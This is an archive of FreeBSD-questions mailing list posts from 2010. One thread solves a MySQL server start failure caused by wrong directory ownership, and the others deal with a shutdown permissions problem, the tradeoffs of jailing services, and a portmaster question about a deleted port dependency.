On Sun, Jan 31, 2010 at 11:35:22PM -0500, Michael Powell wrote: John wrote: If this isn't the right list - if I should try another let me know - but since this is the mysql-server-5.4.2 package, and since you folks have been so helpful, I thought I'd give it a go. Anyway, the system is 8.0-RELEASE and that package is installed, and I can't start the server. Not only can I not start the server, but it's not giving me a clue. I can't find anything anywhere. Not in /var/log/messages, not anywhere. When I run /usr/local/etc/rc.d/mysqlserver start it says Starting mysql., pauses for several seconds (I don't see anything go by in top) and then the script exits. At that point, one would expect, there's no /tmp/mysql.sock, there's nothing in messages or anywhere else. With nothing to go on, well, I don't know where to start. Any suggestions? First is there a mysql_enable=YES line in /etc/rc.conf? The rc subr startup system requires it and also the complete path as you did type above. Although since it is mysql-server and you got a response I'll assume the above is just a typo here in this mail. If you have changed the location of the database files this variable will need setting in /etc/rc.conf as well. The default is /var/db/mysql. Notice this directory should be owned by the mysql:mysql user/group combo. This will allow for the writing of the machine-hostname.pid file. There will also be a machine-hostname.err file which is the log you need to look at. If these files are not present it is either not getting that far in the startup, or there is a permissions problem. The normal location of the socket is /tmp, which should be permissions 1777 (sticky bit set). You do have a line setting the hostname of the machine in /etc/rc.conf too, right? Such as hostname=testbed.test.zip for my local dev server at home. This should be resolvable either by DNS or a hosts file. Also, be aware that the location of the my.cnf file is now /usr/local/etc, although should this be missing it should still look for it in /var/db/mysql as a fallback. If this file is world writable MySQL will ignore it. The establishment of the mysql user and group should have occurred as part of the port installation. I use ports and not packages, as well as the older version of 5.1.42 so I cannot speak to the efficacy of installing a package of 5.4.x. Perhaps a package problem? Try installing the 5.1.42 port using the ports system instead is one possibility if such may be the case. Good job, Mike! You nailed it, though what some of the other helpful folks wrote had me on the right path, too. For some reason, the binary-configure after the pkg_add left everything owned by root:wheel. cd /mysql ; chown -R mysql:mysql . was the solution. After that, everything came out and flew straight! Somehow, the mysql user and group got created, but everything was still owned by root:wheel. Go figure. Just for the record, my rc.conf had already contained: mysql_dbdir=/mysql mysql_enable=YES mysql_pidfile=/var/run/mysqld.pid Also for the record, the last one is ignored. The pid file is still in /mysql/`hostname`.pid So - for those of you who said don't try to run it anywhere but /var/db/mysql - maybe you're right. Maybe that's what led, indirectly, to the ownership not getting set correctly. But, once you know the problem, the solution is simple, and it's now doing a great job of running where I want it to run. -- John Lind j...@starfire.mn.org ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Shutdown
Hi, On 02 February 2010 am 10:18:28 Jeff Molofee wrote: I have completely lost the ability to shutdown/reboot/logout... I've found a few pages on this issue, and nothing seems to resolve the issue. I'm in wheel, operator groups, hal, dbus, gnome_enable all set... consolekit showing a token, proc mounted... and still nothing... what else could be wrong? what happens when you enter shutdown -p now in a console? There should be some message? Erich ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: How far to go with jailing?
Hi, On 02 February 2010 am 09:57:13 Jeff Mitchell wrote: Strikes me that setting up jails for bloody-well-every-other service might be 'fun' .. it is just your work. As there is still only a single kernel running, there is no real difference. But you must maintain every jail as every jail uses its own world. I use jails once in a while. They give a good feeling and do not cost much to setup. But - a big but - you must make sure that the data stays consistant over the jails. Jailing a webserver is not a problem. But putting file-servers for different protocols into different jails might be a problem. Letting different jails run accessing the same data, does not make sense for me. Erich ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
fixing up port dependencies
Hello all, I'm going through a round of port upgrades and came upon a dependency issue. I could probably muscle through and make it work, but I'd like to know what people see as a correct solution to this problem. I'm still in the process of grokking the nitty-gritty bits of ports. Here's the issue: I updated my ports tree with csup, and tried to run 'portmaster -na'. It gave me this: === The mail/p5-Email-Simple-Creator port has been deleted: Folded into p5-Email-Simple package Ok, that makes sense. But what do I do to fix it? It seems I need to replace dependencies on p5-Email-Simple-Creator with dependencies on p5-Email-Simple. But if I manually do that, won't my changes be blown away the next time I update ports? Perhaps I should use the '-o' (origin) option of portmaster? I'm not 100% sure how that works, incidentally. I assume something like: portmaster -o p5-Email-Simple p5-Email-Simple-Creator Will those changes get blown away by the next update of ports? Is the most correct solution just to wait until all maintainers of ports which depend on p5-Email-Simple-Creator each update their makefiles to depend on p5-Email-Simple, instead? (Though that doesn't help in the short term :) I'm curious of people's thoughts on this. Thanks -John ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
